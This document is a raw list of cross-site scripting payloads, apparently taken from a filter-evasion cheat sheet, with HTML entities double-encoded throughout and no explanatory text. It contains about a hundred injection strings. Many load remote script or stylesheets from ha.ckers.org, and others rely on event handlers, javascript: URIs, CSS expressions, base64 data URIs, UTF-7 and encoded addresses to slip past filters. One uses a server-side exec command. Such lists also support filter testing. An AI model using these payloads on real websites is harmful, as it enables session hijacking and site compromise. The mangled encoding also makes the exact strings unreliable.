&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
